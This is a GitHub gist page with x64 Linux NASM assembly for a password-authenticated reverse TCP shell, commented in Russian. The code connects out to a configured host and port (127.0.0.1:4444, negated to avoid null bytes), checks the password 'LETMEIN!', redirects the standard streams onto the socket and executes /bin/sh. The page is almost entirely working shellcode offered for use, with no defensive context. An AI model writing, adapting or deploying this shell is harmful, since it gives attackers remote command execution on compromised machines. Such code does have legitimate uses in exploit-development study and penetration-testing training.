Forked from alanvivona/reverse-tcp-auth-shell.nasm
Last active
March 14, 2019 18:19
-
-
Save stychos/52a8bc22e46ba534fd611ba033887244 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; ================================================= | |
| ; Защищённый реверсивный TCP шелл для Linux x64 | |
| ; Author: Alan Vivona | |
| ; ================================================= | |
| global _start | |
| ; Номера системных вызовов | |
| syscalls.socket equ 0x29 | |
| syscalls.bind equ 0x31 | |
| syscalls.listen equ 0x32 | |
| syscalls.connect equ 0x2a | |
| syscalls.accept equ 0x2b | |
| syscalls.close equ 0x03 | |
| syscalls.dup2 equ 0x21 | |
| syscalls.write equ 0x01 | |
| syscalls.read equ 0x00 | |
| syscalls.execve equ 0x3b | |
| ; Определения констант | |
| ipv4 equ 0x02 ; AF_INET | |
| ipv4.addressLen equ 0x10 | |
| tcp equ 0x01 ; SOCK_STREAM | |
| ; Стандартные потоки | |
| standardIO.in equ 0x00 | |
| standardIO.out equ 0x01 | |
| standardIO.err equ 0x02 | |
| ;:> echo -n '//bin/sh' | rev | xxd | |
| ;: 00000000: 6873 2f6e 6962 2f2f hs/nib// | |
| binshString equ 0x68732f6e69622f2f | |
| ; Конфигурация | |
| config.max_cons equ 0x2 | |
| config.password equ 0x4d54454c214e4945 ; MTEL!NIE > LETMEIN! | |
| config.target equ 0x100007f5c110002 ; tcp://127.0.0.1:4444 | |
| ; Это содержит нулевые байты, так что я заменил антиподом | |
| config.target.complement equ 0xfeffff80a3eefffe ; neg(tcp://127.0.0.1:4444) | |
| section .text | |
| _start: | |
| ; 1 - Создаём сокет | |
| push syscalls.socket | |
| pop rax | |
| cdq | |
| push ipv4 | |
| pop rdi | |
| push tcp | |
| pop rsi | |
| syscall | |
| mov r15, rax ; сохраняем fd сокета в r15 | |
| ; 2 - Соединяемся с целевой машиной | |
| xchg rax, rdi | |
| mov rcx, config.target.complement | |
| neg rcx | |
| push rcx | |
| mov rsi, rsp | |
| push ipv4.addressLen | |
| pop rdx | |
| push syscalls.connect | |
| pop rax | |
| syscall | |
| ; 3 - Читаем пароль из клиентского fd | |
| read_pass: | |
| xor rax, rax ; номер системного вызова read == 0x00 | |
| mov rdi, r15 ; rdi = fd | |
| push 0x04 | |
| pop rdx ; rdx = размер вводимых данных | |
| sub rsp, rdx | |
| mov rsi, rsp ; rsi => buffer | |
| syscall | |
| ; Проевряем пароль | |
| mov rax, config.password | |
| mov rdi, rsi | |
| scasq | |
| jne read_pass | |
| ; 4 - Дублируем стандартные потоки | |
| mov rdi, r15 ; Восстанавливаем fd сокета в rdi | |
| push 0x02 | |
| pop rsi | |
| loop_through_stdfs: | |
| push syscalls.dup2 | |
| pop rax | |
| syscall | |
| dec rsi | |
| jns loop_through_stdfs | |
| ; 5 - Запускаем | |
| xor rdx, rdx | |
| push rdx ; пушим нулевой байт первым | |
| mov rbx, binshString ; пушим реверсивное /bin//sh | |
| push rbx ; сохраняем адрес строки /bin//sh в rdi | |
| mov rdi, rsp | |
| push rdx ; пушим второй нулевой байт | |
| mov rdx, rsp | |
| push rdi ; сохраняем адрес строки /bin//sh в rsi | |
| mov rsi, rsp | |
| push syscalls.execve | |
| pop rax | |
| syscall |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment